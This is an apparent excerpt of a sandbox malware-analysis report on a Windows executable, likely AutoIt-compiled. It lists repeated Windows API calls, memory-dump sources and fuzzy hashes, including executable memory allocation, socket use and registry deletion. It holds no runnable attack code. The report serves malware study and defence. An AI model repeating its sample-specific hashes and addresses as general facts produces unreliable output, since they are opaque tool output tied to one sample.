                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003E7794
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: fd1e4986c4099553fbabeecd051fe70b7b14bd50e186d88471b8d70858694780
                                                          • Instruction ID: 83c3e37bded4ad23f741d3ee9c85be24492b3b7552a1d423e608d1af19ab3036
                                                          • Opcode Fuzzy Hash: fd1e4986c4099553fbabeecd051fe70b7b14bd50e186d88471b8d70858694780
                                                          • Instruction Fuzzy Hash: BE113A72244248BFEF215F61CC01FE7776CEF89B54F124228F641A60D0C272E851CB10
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: A$@BB
                                                          • API String ID: 3494438863-782587721
                                                          • Opcode ID: 988ea72d25ffb9fbe6afc579e9f8a4ce76d9a0d705a65495cd2e4abe635a296f
                                                          • Instruction ID: bc02692332c5bc6255f6f44652f87d09d2bfbfe4fef34e0322f75b65a7704740
                                                          • Opcode Fuzzy Hash: 988ea72d25ffb9fbe6afc579e9f8a4ce76d9a0d705a65495cd2e4abe635a296f
                                                          • Instruction Fuzzy Hash: 3FF0A475304712CBE737AF16BC52AA22795E700338F9000A6E500CE1C0EB3488824B98
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 003A1775
                                                            • Part of subcall function 003DBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,003A195E,?), ref: 003DBFFE
                                                            • Part of subcall function 003DBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003DC010
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003A196D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                          • String ID: 8]$WIN_XPe
                                                          • API String ID: 582185067-2696490331
                                                          • Opcode ID: 51288a6b098ac58857904c098e7daf878c8ce6310a3f3bde82dd3f85f7db5b3d
                                                          • Instruction ID: 4d4d90395e2818c632199c0688090993c9bf0f229018270359951952774a008e
                                                          • Opcode Fuzzy Hash: 51288a6b098ac58857904c098e7daf878c8ce6310a3f3bde82dd3f85f7db5b3d
                                                          • Instruction Fuzzy Hash: 3DF0C971800109DFDB27DB91CA84AECBBFCEB09301F552095E142A6590D7724F85DF64
                                                          APIs
                                                          • __lock.LIBCMT ref: 00389B94
                                                            • Part of subcall function 00389C0B: __mtinitlocknum.LIBCMT ref: 00389C1D
                                                            • Part of subcall function 00389C0B: EnterCriticalSection.KERNEL32(00000000,?,00389A7C,0000000D), ref: 00389C36
                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00389BA4
                                                            • Part of subcall function 00389100: ___addlocaleref.LIBCMT ref: 0038911C
                                                            • Part of subcall function 00389100: ___removelocaleref.LIBCMT ref: 00389127
                                                            • Part of subcall function 00389100: ___freetlocinfo.LIBCMT ref: 0038913B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                          • String ID: 8A$8A
                                                          • API String ID: 547918592-441909865
                                                          • Opcode ID: 19a88e42b1ab8b896635e6aa6b53cd8e3c0e69192d23999425ec9bf3baff86fc
                                                          • Instruction ID: 8306589bb07c6e58d7d099d9fb76362ef3b2cff88125ea0e9f969e2f0af86406
                                                          • Opcode Fuzzy Hash: 19a88e42b1ab8b896635e6aa6b53cd8e3c0e69192d23999425ec9bf3baff86fc
                                                          • Instruction Fuzzy Hash: CBE0863954B300A5D613F7A5AA077A866505B00B21F6441DBF445590C1CE781540871F
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00364B83,?), ref: 00364C44
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00364C56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: f4236449bf2477f572d6ee0fe1ca7561fe0d2d262b9163173be41d6895b05407
                                                          • Instruction ID: dc7cb42b9083b1a2b37b22af9957d13d25aa819f27534e198be95f72e85fe3e5
                                                          • Opcode Fuzzy Hash: f4236449bf2477f572d6ee0fe1ca7561fe0d2d262b9163173be41d6895b05407
                                                          • Instruction Fuzzy Hash: 79D05B30910723DFD7355F31D94864677D9AF05351F11C93ED496DA2A4E7B4D4C0C650
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00364BD0,?,00364DEF,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364C11
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00364C23
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: 97008a653b51b185932be2a196bb503862c0f4fbcfdfae59fe205e6ace80249f
                                                          • Instruction ID: fd8fcbb23a8e2709afa77a29285a4c4be43e9f948906a483dcb83b74d4511fba
                                                          • Opcode Fuzzy Hash: 97008a653b51b185932be2a196bb503862c0f4fbcfdfae59fe205e6ace80249f
                                                          • Instruction Fuzzy Hash: A0D01230911713DFD7216F71D948647B6DAEF09351F11CD3ED486DA2A4E6F4D480C654
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,003E1039), ref: 003E0DF5
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003E0E07
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: 7ef443137ae57e50f7884acb28757ef2a926965c57914b5ddc21276dc6a48508
                                                          • Instruction ID: abbb3468989213447fc16c44979599b77f6d1762a88838d0363605829d5e4271
                                                          • Opcode Fuzzy Hash: 7ef443137ae57e50f7884acb28757ef2a926965c57914b5ddc21276dc6a48508
                                                          • Instruction Fuzzy Hash: 87D0C231400B26DFC3224FB1C848382B2DAAF40341F118D3ED486D6190D7F4D8D0C604
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003D8CF4,?,003EF910), ref: 003D90EE
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003D9100
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: 29206296b4b67380f91501006844953e566fec64170d2fc8382bb357a4742173
                                                          • Instruction ID: 5e652dd15887d81e51f44bfac44828cca7873abda4e2a21319e3dedd20ec9885
                                                          • Opcode Fuzzy Hash: 29206296b4b67380f91501006844953e566fec64170d2fc8382bb357a4742173
                                                          • Instruction Fuzzy Hash: 9AD01735510723CFDB229F32E85874676E8AF05351F13CA3FD48ADA690EAB4C880CA90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: 6f3150c54c8ee4f933f0c96beb7160bb406626ee7d0a476928db07201388cde1
                                                          • Instruction ID: 7bdf92f2429b0020381a5085dad51bfac6222465f8651f8de341f10a677dd8ff
                                                          • Opcode Fuzzy Hash: 6f3150c54c8ee4f933f0c96beb7160bb406626ee7d0a476928db07201388cde1
                                                          • Instruction Fuzzy Hash: 32D01776844218FACB139A90D8888F9737CEB1A701F242562F906E2480E2668B94EA25
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6546b8b7e508d59faf13d46df6153334af70be74d63cdaf6bf240564dde1a2fc
                                                          • Instruction ID: 75c7434478536c31fe61a8054f759a715756ab06fe74d10f4ec6de7b5e2c204e
                                                          • Opcode Fuzzy Hash: 6546b8b7e508d59faf13d46df6153334af70be74d63cdaf6bf240564dde1a2fc
                                                          • Instruction Fuzzy Hash: 44C18174A04216EFCB15CFA5C884EAEBBF5FF88308B154598E909EB651D730DD41DB90
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?), ref: 003DE0BE
                                                          • CharLowerBuffW.USER32(?,?), ref: 003DE101
                                                            • Part of subcall function 003DD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003DD7C5
                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 003DE301
                                                          • _memmove.LIBCMT ref: 003DE314
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                          • String ID:
                                                          • API String ID: 3659485706-0
                                                          • Opcode ID: 19d5e7ab4d194b4a043ceff9707cf93327f3a2b814bee0af7694a9244e5cfeef
                                                          • Instruction ID: 713bf34ec8d645bd54d3951bab64149f0bae6587d0dbe6285491ac7b77ce3654
                                                          • Opcode Fuzzy Hash: 19d5e7ab4d194b4a043ceff9707cf93327f3a2b814bee0af7694a9244e5cfeef
                                                          • Instruction Fuzzy Hash: 75C14876608301DFC716EF28C480A6ABBE4FF89714F14896EF8999B351D731E946CB81
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 003D80C3
                                                          • CoUninitialize.OLE32 ref: 003D80CE
                                                            • Part of subcall function 003BD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003BD5D4
                                                          • VariantInit.OLEAUT32(?), ref: 003D80D9
                                                          • VariantClear.OLEAUT32(?), ref: 003D83AA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 780911581-0
                                                          • Opcode ID: a6c03938745b103a0c767b17d99a700ecbaf9b88c70c62c7222bc1e6bbccfddc
                                                          • Instruction ID: f1c1336f6a5de5d6913a32b4fce5dfec0d2499668b48889e310cf81e8984f0e8
                                                          • Opcode Fuzzy Hash: a6c03938745b103a0c767b17d99a700ecbaf9b88c70c62c7222bc1e6bbccfddc
                                                          • Instruction Fuzzy Hash: 77A1497A6047019FCB12DF54D481B2AB7E8BF89714F04885AF9999B3A1CB30FD05CB41
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: 0c15aabdf73b45d8f4ec79251977ef0a143e22971d17adab69a5568488f0f968
                                                          • Instruction ID: 5fd3f07705aa7404cbcfd91b577db3e07fc4c27bed1a727175aed8afb8a8ae94
                                                          • Opcode Fuzzy Hash: 0c15aabdf73b45d8f4ec79251977ef0a143e22971d17adab69a5568488f0f968
                                                          • Instruction Fuzzy Hash: F251CA747003419ECF26AF65D892AB9B3E99F44314F20C81FE686DBA93DB78D8448701
                                                          APIs
                                                          • GetWindowRect.USER32(00E0E240,?), ref: 003E9863
                                                          • ScreenToClient.USER32(00000002,00000002), ref: 003E9896
                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 003E9903
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: b830fefbf6cc2a3f7b719ab1961d8f776b3772340d6302b1c4dbd42ae735e7b3
                                                          • Instruction ID: 5134029084ab330596af01d64ca70d4e89d5928108c044c289e3101504fb0efc
                                                          • Opcode Fuzzy Hash: b830fefbf6cc2a3f7b719ab1961d8f776b3772340d6302b1c4dbd42ae735e7b3
                                                          • Instruction Fuzzy Hash: 16515F34A00258EFCF22DF25D880AAE7BB5FF45360F15826AF8559B2E1D770AD41CB90
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003B9AD2
                                                          • __itow.LIBCMT ref: 003B9B03
                                                            • Part of subcall function 003B9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003B9DBE
                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 003B9B6C
                                                          • __itow.LIBCMT ref: 003B9BC3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: 5425c34b36e4636b67c41664fe13cdd88f10a2b150b98e9aabc455879d555e48
                                                          • Instruction ID: 8a2407781863a176dc340eee350bc567ca61c560ebe7fee79a90469c347dabd9
                                                          • Opcode Fuzzy Hash: 5425c34b36e4636b67c41664fe13cdd88f10a2b150b98e9aabc455879d555e48
                                                          • Instruction Fuzzy Hash: 5A419670A00308ABDF16EF54D845BFE7BB9EF44718F40406AFA05AB291DB709E44CBA1
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 003D69D1
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003D69E1
                                                            • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                            • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003D6A45
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003D6A51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                          • String ID:
                                                          • API String ID: 2214342067-0
                                                          • Opcode ID: e59a33313aad496c02c3aeea1157b7c2de1a8d666b4660a8ca7ada9e77855f49
                                                          • Instruction ID: d2fce5d8bf8180337b7281bc9c1da5545343c04853619bef49ec19fed75ac7de
                                                          • Opcode Fuzzy Hash: e59a33313aad496c02c3aeea1157b7c2de1a8d666b4660a8ca7ada9e77855f49
                                                          • Instruction Fuzzy Hash: 30419175640200AFEB62AF64DC87F2A77E89F19B54F04C519FA59AF3C2DAB09D008791
                                                          APIs
                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003EF910), ref: 003D64A7
                                                          • _strlen.LIBCMT ref: 003D64D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: 4f463eac2f01081f95f643d0e59cb2721498434885db7b519b4e7f37e9d79159
                                                          • Instruction ID: 07842bdea16d38c6951b41292ea44df737e763c0363147d1518ca3e5b6ad5450
                                                          • Opcode Fuzzy Hash: 4f463eac2f01081f95f643d0e59cb2721498434885db7b519b4e7f37e9d79159
                                                          • Instruction Fuzzy Hash: A041A572500104AFCB16EBA4EC96FAEB7ADAF05310F108156F9259F396DB30AD44CB50
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003CB89E
                                                          • GetLastError.KERNEL32(?,00000000), ref: 003CB8C4
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003CB8E9
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003CB915
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
